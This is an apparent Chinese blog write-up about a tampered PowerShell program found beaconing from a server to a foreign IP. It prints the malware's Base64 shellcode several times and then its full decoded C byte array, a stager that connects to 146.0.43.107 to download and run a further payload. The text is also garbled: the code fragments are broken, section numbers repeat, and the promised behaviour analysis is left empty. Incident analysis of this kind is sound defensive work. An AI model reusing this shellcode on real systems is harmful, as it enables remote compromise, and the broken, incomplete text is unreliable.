本文链接网址:
一、事件回放
网络管理员在服务器上通过网络监控软件检测到,,有程序在不断向外发包,并且ip地址显示国外的区域,经过相关安全工程师的分析和定位,最确定是微软操作系统上的Power Shell程序出现异常。发现的这个Power Shell程序和微软操作系统上的Power Shell程序不同,出现异常的这个Power Shell会不断的向外发包。经过该安全工程师的分析和反编译程序,最终得到了下面这段关键的代码,其中黄色部分的代码是最为关键的,后面会对这段代码进行解释和分析:
) })
}
)
‘Class, Public, Sealed, AnsiClass, AutoClass’
‘RTSpecialName, HideBySig, Public”Runtime, Managed’)
‘Public, HideBySig, NewSlot, Virtual”Runtime, Managed’)
}
1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//V6IAAAABNb3ppbGxhLzUuMCAoY29
tcGF0aWJsZTsgTVNJRSAxMC4wOyBXaW5kb3dzIE5UIDYuMjsgV09XNjQ7IFRyaWRlbnQvNi4wOyBUb3VjaDsgTUFTUEpTKQBYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYA
Fkx/1dXV1dRaDpWeaf/1et5WzHJUVFqA1FRaFAAAABTUGhXiZ/G/9XrYlkx0lJoAAJghFJSUlFSUGjrVS47/9WJxjH/V1dXV1ZoLQYYe//VhcB0RDH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9
XagdRVlBot1fgC//VvwAvAAA5x3S8Mf/rFetJ6Jn///8vaGZZbgAAaPC1olb/1WpAaAAQAABoAABAAFdoWKRT5f/Vk1NTiedXaAAgAABTVmgSloni/9WFwHTNiwcBw4XAdeVYw+g3////MTQ2LjAuN
) (
) (
二、对反编译关键代码的注释
1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//V6IAAAABNb3ppbGxhLzUuMCAoY29
tcGF0aWJsZTsgTVNJRSAxMC4wOyBXaW5kb3dzIE5UIDYuMjsgV09XNjQ7IFRyaWRlbnQvNi4wOyBUb3VjaDsgTUFTUEpTKQBYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYA
Fkx/1dXV1dRaDpWeaf/1et5WzHJUVFqA1FRaFAAAABTUGhXiZ/G/9XrYlkx0lJoAAJghFJSUlFSUGjrVS47/9WJxjH/V1dXV1ZoLQYYe//VhcB0RDH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9
XagdRVlBot1fgC//VvwAvAAA5x3S8Mf/rFetJ6Jn///8vaGZZbgAAaPC1olb/1WpAaAAQAABoAABAAFdoWKRT5f/Vk1NTiedXaAAgAABTVmgSloni/9WFwHTNiwcBw4XAdeVYw+g3////MTQ2LjAuN
DMuMTA3AA==")
//调用保存申请内存空间的地址
) (
//调用kernel32.dll库中函数CreateThread创建线程,并且线程的回调函数的地址为数组$ro8d50FQZ0的字符串地址
) (
等待线程的创建成功
二、黄色部分Base64字符串的解码
//很明显数组$umdAM8XBH中的字符是ShellCode代码但是需要先Base64解码:
1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//V6IAAAABNb3ppbGxhLzUuMCAoY29
tcGF0aWJsZTsgTVNJRSAxMC4wOyBXaW5kb3dzIE5UIDYuMjsgV09XNjQ7IFRyaWRlbnQvNi4wOyBUb3VjaDsgTUFTUEpTKQBYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYA
Fkx/1dXV1dRaDpWeaf/1et5WzHJUVFqA1FRaFAAAABTUGhXiZ/G/9XrYlkx0lJoAAJghFJSUlFSUGjrVS47/9WJxjH/V1dXV1ZoLQYYe//VhcB0RDH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9
XagdRVlBot1fgC//VvwAvAAA5x3S8Mf/rFetJ6Jn///8vaGZZbgAAaPC1olb/1WpAaAAQAABoAABAAFdoWKRT5f/Vk1NTiedXaAAgAABTVmgSloni/9WFwHTNiwcBw4XAdeVYw+g3////MTQ2LjAuN
DMuMTA3AA==")
黄色部分的字符串的解码
Base64编码字符串在线解码的网址:
1.Base64字符串解码成字符串–显然这种解码方式是不对的
2.其实这段Base64加密的编码解密出来是
charshellCode[]="\xfc\xe8\x89\x00\x00\x00\x60\x89""\xe5\x31\xd2\x64\x8b\x52\x30\x8b""\x52\x0c\x8b\x52\x14\x8b\x72\x28""\x0f\xb7\x4a\x26\x31\xff\x31\xc0""\xac\x3c\x61\x7c\x02\x2c\x20\xc1""\xcf\x0d\x01\xc7\xe2\xf0\x52\x57""\x8b\x52\x10\x8b\x42\x3c\x01\xd0""\x8b\x40\x78\x85\xc0\x74\x4a\x01""\xd0\x50\x8b\x48\x18\x8b\x58\x20""\x01\xd3\xe3\x3c\x49\x8b\x34\x8b""\x01\xd6\x31\xff\x31\xc0\xac\xc1""\xcf\x0d\x01\xc7\x38\xe0\x75\xf4""\x03\x7d\xf8\x3b\x7d\x24\x75\xe2""\x58\x8b\x58\x24\x01\xd3\x66\x8b""\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b""\x04\x8b\x01\xd0\x89\x44\x24\x24""\x5b\x5b\x61\x59\x5a\x51\xff\xe0""\x58\x5f\x5a\x8b\x12\xeb\x86\x5d""\x68\x6e\x65\x74\x00\x68\x77\x69""\x6e\x69\x54\x68\x4c\x77\x26\x07""\xff\xd5\xe8\x80\x00\x00\x00\x4d""\x6f\x7a\x69\x6c\x6c\x61\x2f\x35""\x2e\x30\x20\x28\x63\x6f\x6d\x70""\x61\x74\x69\x62\x6c\x65\x3b\x20""\x4d\x53\x49\x45\x20\x31\x30\x2e""\x30\x3b\x20\x57\x69\x6e\x64\x6f""\x77\x73\x20\x4e\x54\x20\x36\x2e""\x32\x3b\x20\x57\x4f\x57\x36\x34""\x3b\x20\x54\x72\x69\x64\x65\x6e""\x74\x2f\x36\x2e\x30\x3b\x20\x54""\x6f\x75\x63\x68\x3b\x20\x4d\x41""\x53\x50\x4a\x53\x29\x00\x58\x58""\x58\x58\x58\x58\x58\x58\x58\x58""\x58\x58\x58\x58\x58\x58\x58\x58""\x58\x58\x58\x58\x58\x58\x58\x58""\x58\x58\x58\x58\x58\x58\x58\x58""\x58\x58\x58\x58\x58\x58\x00\x59""\x31\xff\x57\x57\x57\x57\x51\x68""\x3a\x56\x79\xa7\xff\xd5\xeb\x79""\x5b\x31\xc9\x51\x51\x6a\x03\x51""\x51\x68\x50\x00\x00\x00\x53\x50""\x68\x57\x89\x9f\xc6\xff\xd5\xeb""\x62\x59\x31\xd2\x52\x68\x00\x02""\x60\x84\x52\x52\x52\x51\x52\x50""\x68\xeb\x55\x2e\x3b\xff\xd5\x89""\xc6\x31\xff\x57\x57\x57\x57\x56""\x68\x2d\x06\x18\x7b\xff\xd5\x85""\xc0\x74\x44\x31\xff\x85\xf6\x74""\x04\x89\xf9\xeb\x09\x68\xaa\xc5""\xe2\x5d\xff\xd5\x89\xc1\x68\x45""\x21\x5e\x31\xff\xd5\x31\xff\x57""\x6a\x07\x51\x56\x50\x68\xb7\x57""\xe0\x0b\xff\xd5\xbf\x00\x2f\x00""\x00\x39\xc7\x74\xbc\x31\xff\xeb""\x15\xeb\x49\xe8\x99\xff\xff\xff""\x2f\x68\x66\x59\x6e\x00\x00\x68""\xf0\xb5\xa2\x56\xff\xd5\x6a\x40""\x68\x00\x10\x00\x00\x68\x00\x00""\x40\x00\x57\x68\x58\xa4\x53\xe5""\xff\xd5\x93\x53\x53\x89\xe7\x57""\x68\x00\x20\x00\x00\x53\x56\x68""\x12\x96\x89\xe2\xff\xd5\x85\xc0""\x74\xcd\x8b\x07\x01\xc3\x85\xc0""\x75\xe5\x58\xc3\xe8\x37\xff\xff""\xff\x31\x34\x36\x2e\x30\x2e\x34""\x33\x2e\x31\x30\x37\x00";
三、ShellCode代码行为的分析
1.编写测试测试程序,对ShellCode的行为进行分析
只要有信心,人永远不会挫败
